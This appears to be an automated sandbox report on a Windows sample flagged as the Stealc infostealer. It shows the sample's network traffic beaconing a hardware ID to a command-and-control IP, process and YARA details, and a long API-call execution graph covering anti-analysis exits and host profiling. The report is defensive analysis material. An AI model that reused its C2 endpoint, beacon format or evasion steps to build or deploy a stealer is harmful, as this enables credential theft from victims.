Oct 13, 2024 13:59:37.742996931 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 13, 2024 13:59:37.748512030 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 13, 2024 13:59:37.753431082 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 13, 2024 13:59:37.993841887 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 13, 2024 13:59:37.994164944 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 13, 2024 13:59:41.451417923 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2024 13:59:51.764630079 CEST | 53 | 62528 | 162.159.36.2 | 192.168.2.4
Oct 13, 2024 13:59:52.460143089 CEST | 53 | 62989 | 1.1.1.1 | 192.168.2.4
                    • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 7472 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 13, 2024 13:59:09.759407997 CEST | 89 | OUT | GET / HTTP/1.1
                    Host: 185.215.113.37
                    Connection: Keep-Alive
                    Cache-Control: no-cache
Oct 13, 2024 13:59:37.742793083 CEST | 203 | IN | HTTP/1.1 200 OK
                    Date: Sun, 13 Oct 2024 11:59:37 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
Oct 13, 2024 13:59:37.748512030 CEST | 411 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB
                    Host: 185.215.113.37
                    Content-Length: 210
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 41 39 34 46 32 38 36 39 36 37 39 34 33 34 30 30 30 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a
                    Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="hwid"E6A94F286967943400063------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="build"doma------CFHDHIJDGCBAKFIEGHCB--
Oct 13, 2024 13:59:37.993841887 CEST | 210 | IN | HTTP/1.1 200 OK
                    Date: Sun, 13 Oct 2024 11:59:37 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 59 6d 78 76 59 32 73 3d
                    Data Ascii: YmxvY2s=



                    Target ID:0
                    Start time:07:59:04
                    Start date:13/10/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x3d0000
                    File size:1'814'528 bytes
                    MD5 hash:33F53A09CB02C7459D8723408C86EBBE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2072556856.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1751441710.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true


                      Execution Graph

                      Execution Coverage:8.2%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:9.7%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:24
                      execution_graph: the interactive graph rendering is not recoverable as text; API chain recovered from the node labels (addresses as in the report):
                      • 3d2260 and 3d26a0: long runs of sequential calls to 3d45c0 (RtlAllocateHeap, VirtualProtect); dozens from 3d2260, several hundred from 3d26a0, before any other activity
                      • 3e9860: GetPEB, 21 API calls, LoadLibraryA ×5, then GetProcAddress blocks (3e9af4, 3e9b16, 3e9b4f, 3e9b71, 3e9b92); 3e9c10: 43 API calls, then further GetProcAddress blocks (3ea0cc, 3ea21f, 3ea428, 3ea4ab, 3ea4e5, 3ea522, 3ea61b, 3ea686, 3ea6a7)
                      • 3d11d0: GetSystemInfo, GetCurrentProcess + VirtualAllocExNuma, VirtualAlloc / VirtualFree, GlobalMemoryStatusEx + __aulldiv, GetUserDefaultLangID (five separate ExitProcess branches at 3e67a3, 3e67ad, 3e67b7, 3e67c1, 3e67cb), GetUserNameA, GetComputerNameA; each check has its own ExitProcess edge (3d120f, 3d117c, 3d1141, 3d1292, 3d11c4)
                      • 3e6a30: GetComputerNameA, string assembly via 3ea9b0 (lstrlen, lstrcpy, lstrcat), then OpenEventA at 3e6ac2 with either CreateEventA or CloseHandle + Sleep and a retry loop back to 3e6a89
                      • 3e6920: GetSystemTime, sscanf, SystemTimeToFileTime ×2, ExitProcess branch at 3e69d8
                      • 3e5510: lstrlen / lstrcpy string assembly and StrCmpCA at 3e5643, 3e56a0, 3e578a, 3e5856, 3e593f, 3e5a0b (Sleep on one branch); 3e51f0 (20 API calls), 3e52c0 (25 API calls)
                      • 3e7500: GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap + RtlAllocateHeap, wsprintfA
                      • 3d4880: InternetOpenA, StrCmpCA, InternetCloseHandle, then 3d9ac0 CryptStringToBinaryA; 3d4fb0: GetProcessHeap, RtlAllocateHeap, InternetOpenA; 3d5960: 34 API calls
14736->14737 14738 3ea9b0 4 API calls 14737->14738 14739 3d4a7d 14738->14739 14740 3ea920 3 API calls 14739->14740 14741 3d4a84 14740->14741 14742 3ea8a0 lstrcpy 14741->14742 14743 3d4a8d 14742->14743 14744 3d4aa3 InternetConnectA 14743->14744 14744->14700 14745 3d4ad3 HttpOpenRequestA 14744->14745 14747 3d4ebe InternetCloseHandle 14745->14747 14748 3d4b28 14745->14748 14747->14700 14749 3ea9b0 4 API calls 14748->14749 14750 3d4b3c 14749->14750 14751 3ea8a0 lstrcpy 14750->14751 14752 3d4b45 14751->14752 14753 3ea920 3 API calls 14752->14753 14754 3d4b63 14753->14754 14755 3ea8a0 lstrcpy 14754->14755 14756 3d4b6c 14755->14756 14757 3ea9b0 4 API calls 14756->14757 14758 3d4b8b 14757->14758 14759 3ea8a0 lstrcpy 14758->14759 14760 3d4b94 14759->14760 14761 3ea9b0 4 API calls 14760->14761 14762 3d4bb5 14761->14762 14763 3ea8a0 lstrcpy 14762->14763 14764 3d4bbe 14763->14764 14765 3ea9b0 4 API calls 14764->14765 14766 3d4bde 14765->14766 14767 3ea8a0 lstrcpy 14766->14767 14768 3d4be7 14767->14768 14769 3ea9b0 4 API calls 14768->14769 14770 3d4c06 14769->14770 14771 3ea8a0 lstrcpy 14770->14771 14772 3d4c0f 14771->14772 14773 3ea920 3 API calls 14772->14773 14774 3d4c2d 14773->14774 14775 3ea8a0 lstrcpy 14774->14775 14776 3d4c36 14775->14776 14777 3ea9b0 4 API calls 14776->14777 14778 3d4c55 14777->14778 14779 3ea8a0 lstrcpy 14778->14779 14780 3d4c5e 14779->14780 14781 3ea9b0 4 API calls 14780->14781 14782 3d4c7d 14781->14782 14783 3ea8a0 lstrcpy 14782->14783 14784 3d4c86 14783->14784 14785 3ea920 3 API calls 14784->14785 14786 3d4ca4 14785->14786 14787 3ea8a0 lstrcpy 14786->14787 14788 3d4cad 14787->14788 14789 3ea9b0 4 API calls 14788->14789 14790 3d4ccc 14789->14790 14791 3ea8a0 lstrcpy 14790->14791 14792 3d4cd5 14791->14792 14793 3ea9b0 4 API calls 14792->14793 14794 3d4cf6 14793->14794 14795 3ea8a0 lstrcpy 14794->14795 14796 3d4cff 14795->14796 14797 3ea9b0 4 API calls 14796->14797 14798 3d4d1f 14797->14798 14799 3ea8a0 lstrcpy 14798->14799 14800 3d4d28 14799->14800 
14801 3ea9b0 4 API calls 14800->14801 14802 3d4d47 14801->14802 14803 3ea8a0 lstrcpy 14802->14803 14804 3d4d50 14803->14804 14805 3ea920 3 API calls 14804->14805 14806 3d4d6e 14805->14806 14807 3ea8a0 lstrcpy 14806->14807 14808 3d4d77 14807->14808 14809 3ea740 lstrcpy 14808->14809 14810 3d4d92 14809->14810 14811 3ea920 3 API calls 14810->14811 14812 3d4db3 14811->14812 14813 3ea920 3 API calls 14812->14813 14814 3d4dba 14813->14814 14815 3ea8a0 lstrcpy 14814->14815 14816 3d4dc6 14815->14816 14817 3d4de7 lstrlen 14816->14817 14818 3d4dfa 14817->14818 14819 3d4e03 lstrlen 14818->14819 15756 3eaad0 14819->15756 14821 3d4e13 HttpSendRequestA 14822 3d4e32 InternetReadFile 14821->14822 14823 3d4e67 InternetCloseHandle 14822->14823 14828 3d4e5e 14822->14828 14826 3ea800 14823->14826 14825 3ea9b0 4 API calls 14825->14828 14826->14747 14827 3ea8a0 lstrcpy 14827->14828 14828->14822 14828->14823 14828->14825 14828->14827 15763 3eaad0 14829->15763 14831 3e17c4 StrCmpCA 14832 3e17cf ExitProcess 14831->14832 14836 3e17d7 14831->14836 14833 3e19c2 14833->13752 14834 3e187f StrCmpCA 14834->14836 14835 3e185d StrCmpCA 14835->14836 14836->14833 14836->14834 14836->14835 14837 3e1932 StrCmpCA 14836->14837 14838 3e1913 StrCmpCA 14836->14838 14839 3e1970 StrCmpCA 14836->14839 14840 3e18f1 StrCmpCA 14836->14840 14841 3e1951 StrCmpCA 14836->14841 14842 3e18cf StrCmpCA 14836->14842 14843 3e18ad StrCmpCA 14836->14843 14844 3ea820 lstrlen lstrcpy 14836->14844 14837->14836 14838->14836 14839->14836 14840->14836 14841->14836 14842->14836 14843->14836 14844->14836 14846 3ea7a0 lstrcpy 14845->14846 14847 3d5979 14846->14847 14848 3d47b0 2 API calls 14847->14848 14849 3d5985 14848->14849 14850 3ea740 lstrcpy 14849->14850 14851 3d59ba 14850->14851 14852 3ea740 lstrcpy 14851->14852 14853 3d59c7 14852->14853 14854 3ea740 lstrcpy 14853->14854 14855 3d59d4 14854->14855 14856 3ea740 lstrcpy 14855->14856 14857 3d59e1 14856->14857 14858 3ea740 lstrcpy 14857->14858 14859 3d59ee InternetOpenA StrCmpCA 
14858->14859 14860 3d5a1d 14859->14860 14861 3d5fc3 InternetCloseHandle 14860->14861 14862 3e8b60 3 API calls 14860->14862 14863 3d5fe0 14861->14863 14864 3d5a3c 14862->14864 14866 3d9ac0 4 API calls 14863->14866 14865 3ea920 3 API calls 14864->14865 14867 3d5a4f 14865->14867 14868 3d5fe6 14866->14868 14869 3ea8a0 lstrcpy 14867->14869 14870 3ea820 2 API calls 14868->14870 14872 3d601f ctype 14868->14872 14874 3d5a58 14869->14874 14871 3d5ffd 14870->14871 14873 3ea9b0 4 API calls 14871->14873 14877 3ea7a0 lstrcpy 14872->14877 14875 3d6013 14873->14875 14878 3ea9b0 4 API calls 14874->14878 14876 3ea8a0 lstrcpy 14875->14876 14876->14872 14886 3d604f 14877->14886 14879 3d5a82 14878->14879 14880 3ea8a0 lstrcpy 14879->14880 14881 3d5a8b 14880->14881 14882 3ea9b0 4 API calls 14881->14882 14883 3d5aaa 14882->14883 14884 3ea8a0 lstrcpy 14883->14884 14885 3d5ab3 14884->14885 14887 3ea920 3 API calls 14885->14887 14886->13758 14888 3d5ad1 14887->14888 14889 3ea8a0 lstrcpy 14888->14889 14890 3d5ada 14889->14890 14891 3ea9b0 4 API calls 14890->14891 14892 3d5af9 14891->14892 14893 3ea8a0 lstrcpy 14892->14893 14894 3d5b02 14893->14894 14895 3ea9b0 4 API calls 14894->14895 14896 3d5b21 14895->14896 14897 3ea8a0 lstrcpy 14896->14897 14898 3d5b2a 14897->14898 14899 3ea9b0 4 API calls 14898->14899 14900 3d5b56 14899->14900 14901 3ea920 3 API calls 14900->14901 14902 3d5b5d 14901->14902 14903 3ea8a0 lstrcpy 14902->14903 14904 3d5b66 14903->14904 14905 3d5b7c InternetConnectA 14904->14905 14905->14861 14906 3d5bac HttpOpenRequestA 14905->14906 14908 3d5c0b 14906->14908 14909 3d5fb6 InternetCloseHandle 14906->14909 14910 3ea9b0 4 API calls 14908->14910 14909->14861 14911 3d5c1f 14910->14911 14912 3ea8a0 lstrcpy 14911->14912 14913 3d5c28 14912->14913 14914 3ea920 3 API calls 14913->14914 14915 3d5c46 14914->14915 14916 3ea8a0 lstrcpy 14915->14916 14917 3d5c4f 14916->14917 14918 3ea9b0 4 API calls 14917->14918 14919 3d5c6e 14918->14919 14920 3ea8a0 lstrcpy 14919->14920 14921 3d5c77 
14920->14921 14922 3ea9b0 4 API calls 14921->14922 14923 3d5c98 14922->14923 14924 3ea8a0 lstrcpy 14923->14924 14925 3d5ca1 14924->14925 14926 3ea9b0 4 API calls 14925->14926 14927 3d5cc1 14926->14927 14928 3ea8a0 lstrcpy 14927->14928 14929 3d5cca 14928->14929 14930 3ea9b0 4 API calls 14929->14930 14931 3d5ce9 14930->14931 14932 3ea8a0 lstrcpy 14931->14932 14933 3d5cf2 14932->14933 14934 3ea920 3 API calls 14933->14934 14935 3d5d10 14934->14935 14936 3ea8a0 lstrcpy 14935->14936 14937 3d5d19 14936->14937 14938 3ea9b0 4 API calls 14937->14938 14939 3d5d38 14938->14939 14940 3ea8a0 lstrcpy 14939->14940 14941 3d5d41 14940->14941 14942 3ea9b0 4 API calls 14941->14942 14943 3d5d60 14942->14943 14944 3ea8a0 lstrcpy 14943->14944 14945 3d5d69 14944->14945 14946 3ea920 3 API calls 14945->14946 14947 3d5d87 14946->14947 14948 3ea8a0 lstrcpy 14947->14948 14949 3d5d90 14948->14949 14950 3ea9b0 4 API calls 14949->14950 14951 3d5daf 14950->14951 14952 3ea8a0 lstrcpy 14951->14952 14953 3d5db8 14952->14953 14954 3ea9b0 4 API calls 14953->14954 14955 3d5dd9 14954->14955 14956 3ea8a0 lstrcpy 14955->14956 14957 3d5de2 14956->14957 14958 3ea9b0 4 API calls 14957->14958 14959 3d5e02 14958->14959 14960 3ea8a0 lstrcpy 14959->14960 14961 3d5e0b 14960->14961 14962 3ea9b0 4 API calls 14961->14962 14963 3d5e2a 14962->14963 14964 3ea8a0 lstrcpy 14963->14964 14965 3d5e33 14964->14965 14966 3ea920 3 API calls 14965->14966 14967 3d5e54 14966->14967 14968 3ea8a0 lstrcpy 14967->14968 14969 3d5e5d 14968->14969 14970 3d5e70 lstrlen 14969->14970 15764 3eaad0 14970->15764 14972 3d5e81 lstrlen GetProcessHeap RtlAllocateHeap 15765 3eaad0 14972->15765 14974 3d5eae lstrlen 14975 3d5ebe 14974->14975 14976 3d5ed7 lstrlen 14975->14976 14977 3d5ee7 14976->14977 14978 3d5ef0 lstrlen 14977->14978 14979 3d5f04 14978->14979 14980 3d5f1a lstrlen 14979->14980 15766 3eaad0 14980->15766 14982 3d5f2a HttpSendRequestA 14983 3d5f35 InternetReadFile 14982->14983 14984 3d5f6a InternetCloseHandle 14983->14984 14988 3d5f61 
14983->14988 14984->14909 14986 3ea9b0 4 API calls 14986->14988 14987 3ea8a0 lstrcpy 14987->14988 14988->14983 14988->14984 14988->14986 14988->14987 14990 3e1077 14989->14990 14991 3e1151 14990->14991 14992 3ea820 lstrlen lstrcpy 14990->14992 14991->13760 14992->14990 14998 3e0db7 14993->14998 14994 3e0f17 14994->13768 14995 3e0e27 StrCmpCA 14995->14998 14996 3e0e67 StrCmpCA 14996->14998 14997 3e0ea4 StrCmpCA 14997->14998 14998->14994 14998->14995 14998->14996 14998->14997 14999 3ea820 lstrlen lstrcpy 14998->14999 14999->14998 15001 3e0f67 15000->15001 15002 3e1044 15001->15002 15003 3e0fb2 StrCmpCA 15001->15003 15004 3ea820 lstrlen lstrcpy 15001->15004 15002->13776 15003->15001 15004->15001 15006 3ea740 lstrcpy 15005->15006 15007 3e1a26 15006->15007 15008 3ea9b0 4 API calls 15007->15008 15009 3e1a37 15008->15009 15010 3ea8a0 lstrcpy 15009->15010 15011 3e1a40 15010->15011 15012 3ea9b0 4 API calls 15011->15012 15013 3e1a5b 15012->15013 15014 3ea8a0 lstrcpy 15013->15014 15015 3e1a64 15014->15015 15016 3ea9b0 4 API calls 15015->15016 15017 3e1a7d 15016->15017 15018 3ea8a0 lstrcpy 15017->15018 15019 3e1a86 15018->15019 15020 3ea9b0 4 API calls 15019->15020 15021 3e1aa1 15020->15021 15022 3ea8a0 lstrcpy 15021->15022 15023 3e1aaa 15022->15023 15024 3ea9b0 4 API calls 15023->15024 15025 3e1ac3 15024->15025 15026 3ea8a0 lstrcpy 15025->15026 15027 3e1acc 15026->15027 15028 3ea9b0 4 API calls 15027->15028 15029 3e1ae7 15028->15029 15030 3ea8a0 lstrcpy 15029->15030 15031 3e1af0 15030->15031 15032 3ea9b0 4 API calls 15031->15032 15033 3e1b09 15032->15033 15034 3ea8a0 lstrcpy 15033->15034 15035 3e1b12 15034->15035 15036 3ea9b0 4 API calls 15035->15036 15037 3e1b2d 15036->15037 15038 3ea8a0 lstrcpy 15037->15038 15039 3e1b36 15038->15039 15040 3ea9b0 4 API calls 15039->15040 15041 3e1b4f 15040->15041 15042 3ea8a0 lstrcpy 15041->15042 15043 3e1b58 15042->15043 15044 3ea9b0 4 API calls 15043->15044 15045 3e1b76 15044->15045 15046 3ea8a0 lstrcpy 15045->15046 15047 3e1b7f 
15046->15047 15048 3e7500 6 API calls 15047->15048 15049 3e1b96 15048->15049 15050 3ea920 3 API calls 15049->15050 15051 3e1ba9 15050->15051 15052 3ea8a0 lstrcpy 15051->15052 15053 3e1bb2 15052->15053 15054 3ea9b0 4 API calls 15053->15054 15055 3e1bdc 15054->15055 15056 3ea8a0 lstrcpy 15055->15056 15057 3e1be5 15056->15057 15058 3ea9b0 4 API calls 15057->15058 15059 3e1c05 15058->15059 15060 3ea8a0 lstrcpy 15059->15060 15061 3e1c0e 15060->15061 15767 3e7690 GetProcessHeap RtlAllocateHeap 15061->15767 15064 3ea9b0 4 API calls 15065 3e1c2e 15064->15065 15066 3ea8a0 lstrcpy 15065->15066 15067 3e1c37 15066->15067 15068 3ea9b0 4 API calls 15067->15068 15069 3e1c56 15068->15069 15070 3ea8a0 lstrcpy 15069->15070 15071 3e1c5f 15070->15071 15072 3ea9b0 4 API calls 15071->15072 15073 3e1c80 15072->15073 15074 3ea8a0 lstrcpy 15073->15074 15075 3e1c89 15074->15075 15774 3e77c0 GetCurrentProcess IsWow64Process 15075->15774 15078 3ea9b0 4 API calls 15079 3e1ca9 15078->15079 15080 3ea8a0 lstrcpy 15079->15080 15081 3e1cb2 15080->15081 15082 3ea9b0 4 API calls 15081->15082 15083 3e1cd1 15082->15083 15084 3ea8a0 lstrcpy 15083->15084 15085 3e1cda 15084->15085 15086 3ea9b0 4 API calls 15085->15086 15087 3e1cfb 15086->15087 15088 3ea8a0 lstrcpy 15087->15088 15089 3e1d04 15088->15089 15090 3e7850 3 API calls 15089->15090 15091 3e1d14 15090->15091 15092 3ea9b0 4 API calls 15091->15092 15093 3e1d24 15092->15093 15094 3ea8a0 lstrcpy 15093->15094 15095 3e1d2d 15094->15095 15096 3ea9b0 4 API calls 15095->15096 15097 3e1d4c 15096->15097 15098 3ea8a0 lstrcpy 15097->15098 15099 3e1d55 15098->15099 15100 3ea9b0 4 API calls 15099->15100 15101 3e1d75 15100->15101 15102 3ea8a0 lstrcpy 15101->15102 15103 3e1d7e 15102->15103 15104 3e78e0 3 API calls 15103->15104 15105 3e1d8e 15104->15105 15106 3ea9b0 4 API calls 15105->15106 15107 3e1d9e 15106->15107 15108 3ea8a0 lstrcpy 15107->15108 15109 3e1da7 15108->15109 15110 3ea9b0 4 API calls 15109->15110 15111 3e1dc6 15110->15111 15112 3ea8a0 lstrcpy 
15111->15112 15113 3e1dcf 15112->15113 15114 3ea9b0 4 API calls 15113->15114 15115 3e1df0 15114->15115 15116 3ea8a0 lstrcpy 15115->15116 15117 3e1df9 15116->15117 15776 3e7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15117->15776 15120 3ea9b0 4 API calls 15121 3e1e19 15120->15121 15122 3ea8a0 lstrcpy 15121->15122 15123 3e1e22 15122->15123 15124 3ea9b0 4 API calls 15123->15124 15125 3e1e41 15124->15125 15126 3ea8a0 lstrcpy 15125->15126 15127 3e1e4a 15126->15127 15128 3ea9b0 4 API calls 15127->15128 15129 3e1e6b 15128->15129 15130 3ea8a0 lstrcpy 15129->15130 15131 3e1e74 15130->15131 15778 3e7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15131->15778 15134 3ea9b0 4 API calls 15135 3e1e94 15134->15135 15136 3ea8a0 lstrcpy 15135->15136 15137 3e1e9d 15136->15137 15138 3ea9b0 4 API calls 15137->15138 15139 3e1ebc 15138->15139 15140 3ea8a0 lstrcpy 15139->15140 15141 3e1ec5 15140->15141 15142 3ea9b0 4 API calls 15141->15142 15143 3e1ee5 15142->15143 15144 3ea8a0 lstrcpy 15143->15144 15145 3e1eee 15144->15145 15781 3e7b00 GetUserDefaultLocaleName 15145->15781 15148 3ea9b0 4 API calls 15149 3e1f0e 15148->15149 15150 3ea8a0 lstrcpy 15149->15150 15151 3e1f17 15150->15151 15152 3ea9b0 4 API calls 15151->15152 15153 3e1f36 15152->15153 15154 3ea8a0 lstrcpy 15153->15154 15155 3e1f3f 15154->15155 15156 3ea9b0 4 API calls 15155->15156 15157 3e1f60 15156->15157 15158 3ea8a0 lstrcpy 15157->15158 15159 3e1f69 15158->15159 15785 3e7b90 15159->15785 15161 3e1f80 15162 3ea920 3 API calls 15161->15162 15163 3e1f93 15162->15163 15164 3ea8a0 lstrcpy 15163->15164 15165 3e1f9c 15164->15165 15166 3ea9b0 4 API calls 15165->15166 15167 3e1fc6 15166->15167 15168 3ea8a0 lstrcpy 15167->15168 15169 3e1fcf 15168->15169 15170 3ea9b0 4 API calls 15169->15170 15171 3e1fef 15170->15171 15172 3ea8a0 lstrcpy 15171->15172 15173 3e1ff8 15172->15173 15797 3e7d80 GetSystemPowerStatus 15173->15797 15176 3ea9b0 4 API calls 15177 3e2018 15176->15177 15178 3ea8a0 lstrcpy 15177->15178 15179 
3e2021 15178->15179 15180 3ea9b0 4 API calls 15179->15180 15181 3e2040 15180->15181 15182 3ea8a0 lstrcpy 15181->15182 15183 3e2049 15182->15183 15184 3ea9b0 4 API calls 15183->15184 15185 3e206a 15184->15185 15186 3ea8a0 lstrcpy 15185->15186 15187 3e2073 15186->15187 15188 3e207e GetCurrentProcessId 15187->15188 15799 3e9470 OpenProcess 15188->15799 15191 3ea920 3 API calls 15192 3e20a4 15191->15192 15193 3ea8a0 lstrcpy 15192->15193 15194 3e20ad 15193->15194 15195 3ea9b0 4 API calls 15194->15195 15196 3e20d7 15195->15196 15197 3ea8a0 lstrcpy 15196->15197 15198 3e20e0 15197->15198 15199 3ea9b0 4 API calls 15198->15199 15200 3e2100 15199->15200 15201 3ea8a0 lstrcpy 15200->15201 15202 3e2109 15201->15202 15804 3e7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15202->15804 15205 3ea9b0 4 API calls 15206 3e2129 15205->15206 15207 3ea8a0 lstrcpy 15206->15207 15208 3e2132 15207->15208 15209 3ea9b0 4 API calls 15208->15209 15210 3e2151 15209->15210 15211 3ea8a0 lstrcpy 15210->15211 15212 3e215a 15211->15212 15213 3ea9b0 4 API calls 15212->15213 15214 3e217b 15213->15214 15215 3ea8a0 lstrcpy 15214->15215 15216 3e2184 15215->15216 15808 3e7f60 15216->15808 15219 3ea9b0 4 API calls 15220 3e21a4 15219->15220 15221 3ea8a0 lstrcpy 15220->15221 15222 3e21ad 15221->15222 15223 3ea9b0 4 API calls 15222->15223 15224 3e21cc 15223->15224 15225 3ea8a0 lstrcpy 15224->15225 15226 3e21d5 15225->15226 15227 3ea9b0 4 API calls 15226->15227 15228 3e21f6 15227->15228 15229 3ea8a0 lstrcpy 15228->15229 15230 3e21ff 15229->15230 15821 3e7ed0 GetSystemInfo wsprintfA 15230->15821 15233 3ea9b0 4 API calls 15234 3e221f 15233->15234 15235 3ea8a0 lstrcpy 15234->15235 15236 3e2228 15235->15236 15237 3ea9b0 4 API calls 15236->15237 15238 3e2247 15237->15238 15239 3ea8a0 lstrcpy 15238->15239 15240 3e2250 15239->15240 15241 3ea9b0 4 API calls 15240->15241 15242 3e2270 15241->15242 15243 3ea8a0 lstrcpy 15242->15243 15244 3e2279 15243->15244 15823 3e8100 GetProcessHeap RtlAllocateHeap 15244->15823 15247 
3ea9b0 4 API calls 15248 3e2299 15247->15248 15249 3ea8a0 lstrcpy 15248->15249 15250 3e22a2 15249->15250 15251 3ea9b0 4 API calls 15250->15251 15252 3e22c1 15251->15252 15253 3ea8a0 lstrcpy 15252->15253 15254 3e22ca 15253->15254 15255 3ea9b0 4 API calls 15254->15255 15256 3e22eb 15255->15256 15257 3ea8a0 lstrcpy 15256->15257 15258 3e22f4 15257->15258 15829 3e87c0 15258->15829 15261 3ea920 3 API calls 15262 3e231e 15261->15262 15263 3ea8a0 lstrcpy 15262->15263 15264 3e2327 15263->15264 15265 3ea9b0 4 API calls 15264->15265 15266 3e2351 15265->15266 15267 3ea8a0 lstrcpy 15266->15267 15268 3e235a 15267->15268 15269 3ea9b0 4 API calls 15268->15269 15270 3e237a 15269->15270 15271 3ea8a0 lstrcpy 15270->15271 15272 3e2383 15271->15272 15273 3ea9b0 4 API calls 15272->15273 15274 3e23a2 15273->15274 15275 3ea8a0 lstrcpy 15274->15275 15276 3e23ab 15275->15276 15834 3e81f0 15276->15834 15278 3e23c2 15279 3ea920 3 API calls 15278->15279 15280 3e23d5 15279->15280 15281 3ea8a0 lstrcpy 15280->15281 15282 3e23de 15281->15282 15283 3ea9b0 4 API calls 15282->15283 15284 3e240a 15283->15284 15285 3ea8a0 lstrcpy 15284->15285 15286 3e2413 15285->15286 15287 3ea9b0 4 API calls 15286->15287 15288 3e2432 15287->15288 15289 3ea8a0 lstrcpy 15288->15289 15290 3e243b 15289->15290 15291 3ea9b0 4 API calls 15290->15291 15292 3e245c 15291->15292 15293 3ea8a0 lstrcpy 15292->15293 15294 3e2465 15293->15294 15295 3ea9b0 4 API calls 15294->15295 15296 3e2484 15295->15296 15297 3ea8a0 lstrcpy 15296->15297 15298 3e248d 15297->15298 15299 3ea9b0 4 API calls 15298->15299 15300 3e24ae 15299->15300 15301 3ea8a0 lstrcpy 15300->15301 15302 3e24b7 15301->15302 15842 3e8320 15302->15842 15304 3e24d3 15305 3ea920 3 API calls 15304->15305 15306 3e24e6 15305->15306 15307 3ea8a0 lstrcpy 15306->15307 15308 3e24ef 15307->15308 15309 3ea9b0 4 API calls 15308->15309 15310 3e2519 15309->15310 15311 3ea8a0 lstrcpy 15310->15311 15312 3e2522 15311->15312 15313 3ea9b0 4 API calls 15312->15313 15314 3e2543 15313->15314 
15315 3ea8a0 lstrcpy 15314->15315 15316 3e254c 15315->15316 15317 3e8320 17 API calls 15316->15317 15318 3e2568 15317->15318 15319 3ea920 3 API calls 15318->15319 15320 3e257b 15319->15320 15321 3ea8a0 lstrcpy 15320->15321 15322 3e2584 15321->15322 15323 3ea9b0 4 API calls 15322->15323 15324 3e25ae 15323->15324 15325 3ea8a0 lstrcpy 15324->15325 15326 3e25b7 15325->15326 15327 3ea9b0 4 API calls 15326->15327 15328 3e25d6 15327->15328 15329 3ea8a0 lstrcpy 15328->15329 15330 3e25df 15329->15330 15331 3ea9b0 4 API calls 15330->15331 15332 3e2600 15331->15332 15333 3ea8a0 lstrcpy 15332->15333 15334 3e2609 15333->15334 15878 3e8680 15334->15878 15336 3e2620 15337 3ea920 3 API calls 15336->15337 15338 3e2633 15337->15338 15339 3ea8a0 lstrcpy 15338->15339 15340 3e263c 15339->15340 15341 3e265a lstrlen 15340->15341 15342 3e266a 15341->15342 15343 3ea740 lstrcpy 15342->15343 15344 3e267c 15343->15344 15345 3d1590 lstrcpy 15344->15345 15346 3e268d 15345->15346 15888 3e5190 15346->15888 15348 3e2699 15348->13780 16076 3eaad0 15349->16076 15351 3d5009 InternetOpenUrlA 15355 3d5021 15351->15355 15352 3d502a InternetReadFile 15352->15355 15353 3d50a0 InternetCloseHandle InternetCloseHandle 15354 3d50ec 15353->15354 15354->13784 15355->15352 15355->15353 16077 3d98d0 15356->16077 15358 3e0759 15359 3e077d 15358->15359 15360 3e0a38 15358->15360 15363 3e0799 StrCmpCA 15359->15363 15361 3d1590 lstrcpy 15360->15361 15362 3e0a49 15361->15362 16253 3e0250 15362->16253 15365 3e07a8 15363->15365 15366 3e0843 15363->15366 15368 3ea7a0 lstrcpy 15365->15368 15369 3e0865 StrCmpCA 15366->15369 